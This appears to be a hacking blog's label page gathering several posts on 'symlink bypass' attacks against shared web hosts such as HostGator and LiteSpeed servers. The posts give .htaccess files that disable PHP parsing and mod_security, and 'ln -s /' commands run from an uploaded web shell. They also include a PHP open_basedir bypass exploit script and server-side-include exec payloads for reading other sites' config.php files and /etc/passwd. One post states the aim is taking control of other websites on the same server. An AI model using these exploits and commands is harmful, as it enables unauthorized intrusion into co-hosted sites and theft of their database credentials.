Showing posts with label ByPass Symlink. Show all posts
Showing posts with label ByPass Symlink. Show all posts

Tuesday, 15 January 2013

HostGator, HostMonster priv8 bypass

first of all, create a directory called 'r4x' or anything.


create a .htaccess file within the server, and add this code to it.


Code: (Select All)
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html


or...



Code: (Select All)
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html




OK, once you've done that, backconnect to the server, go to the following directory you created.

and type this command

"ln -s /"

done. server bypassed.


easy tip: just create a old symlink already in the server folder, then exchange the .htaccess files that I posted.

NOTE: if this method doesn't work, it may have been patched, don't blame me.

use knowledge for good

Posted by Unknown at 11:55 0 comments

Labels: , ,

PHP 5.3 SAFE MODE BYPASS (PHP SCRIPT) for SYMLINK

Usage:-
  1. Execute it.
  2. In a box, type /etc/passwd 
  3. Click on button Create Symlink.


Code: (Select All)
<?php
/*
PHP 5.2.12/5.3.1 symlink() open_basedir bypass
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a
href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form"
action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';

if(empty($file))
   exit;

if(!is_writable("."))
   die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
   if(!file_exists($fakedir))
       mkdir($fakedir);
   chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
   if(!empty($hardstyle[$a])){
       if(!file_exists($hardstyle[$a]))
           mkdir($hardstyle[$a]);
       chdir($hardstyle[$a]);
       $as++;
   }
}
$as++;
while($as--)
   chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
   if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
   else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>

Posted by Unknown at 11:54 0 comments

Labels: , ,

step to symlink manual using user/paswd

1 .we have a shell in a linux server and is Safe Mode OFF , if its not off Off put the file php.ini , and Disable Functions : None

Code:
http://www.website.com/shell.php
and directory :

/home/ueb/public_html/
2 . create a directory and name it "r00t" with shell with this comand in the "Command Execution" 

mkdir r00t

3 . now we have to go in the directory :

Code:
/home/ueb/public_html/r00t
4 . we write this code in notepad in ouer compurer and save ti as . htaccess this is for allow us to make symlink and reed php files in server 

Code:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
we save the file as "All Files" name it whatever .htaccess

5 . in this file .htaccess this file will be upload at the server in the directory " "r00t" we mak this in the option Upload on shell.
we make sure that we upload .htaccess in the root directory and not in other directorys like /home/ueb/public_html/ !

6. After that , we type this commant in shell :

Code:
ln -s / root
with this we will create a Symlink of root in serverit .

7 . now we see what we have done :

Code:
http://website.com/r00t/root/
like we see root of server ! now we go in /home and see the users and other thing we can take the control in others website that are in the same server in the server we have the shell . if in directory /home see that is Forbidden , than change the url like this :

Code:
http://website.com/r00t/root/home/uebiob...ublic_html
now see the files in target !
click in the document that have configuration

Code:
website..com/r00t/root/home/uebiobjektiv/public_html/install.php

enjoy hacking....

Posted by Unknown at 11:52 0 comments

Labels: , ,

Shtml Bypass Symlink - via 404 Error

Ok now i m going to show you, how can we bypass symlink in using Server Side Includes. Sleepy

Ok lets start,
For this method we need to find a server on the Server Side Includes. 

Code: (Select All)
cd /var/log/proftpd

more xferlog.*|grep victim.com

cat xferlog.*|grep victim.com


Now we come shtml file using a command will run ourselves
Code: (Select All)
<!--#exec cmd="more xferlog.*|grep victim.com" -->


For example, the Symlynk.
ln -s /home/...../public_html/config.php config.txt
Come face to face.
Code: (Select All)
<!--#exec cmd="ln -s /home/...../public_html/config.php config.txt" -->


I'll run the script that I wrote that I do not think that hatches from Litespeed.

Now we come to read config.txt file in a shtml file I create and use the following.
Code: (Select All)
<!--#include virtual="config.txt" -->


So far so error 404 
. htaccess
Code: (Select All)
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml


Done!

This method mostly work on LiteSpeed Web Server Smile

Posted by Unknown at 11:51 0 comments

Labels: , ,

Bypass Symlink

=============================================
symlink bypass with ini method
when you symlink /etc/passwd and you can read it
but symlink /home/user/public_html/config.php opposite with error :
lscgid : execve() :/home/[patch]/public_html/
now you make a .htaccess file in current directory and copy this contain in it:


then symlink with this command:


ln -s /home/user/public_html/config.php config.ini


you see bypassed error execve() :/home/[patch]/public_html/ and can
you read config.ini
====================================================


.htaccess file:


Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm


============================================================

Posted by Unknown at 11:50 0 comments

Labels: , ,

Bypass Symlink 403 (forbidden) on litespeed


edit .htaccess to bypass the





Code: (Select All)
<Files *.php>
ForceType application/x-httpd-php4
</Files>
<ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

Posted by Unknown at 11:48 0 comments

Labels: , ,

Tuesday, 28 August 2012

Htaccess Bypass Symlink


Hi Guys :X

This Htaccess Is For Bypass Symlink... 
Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
 

Posted by Unknown at 12:13 0 comments

Labels: , ,

Subscribe to: Posts (Atom)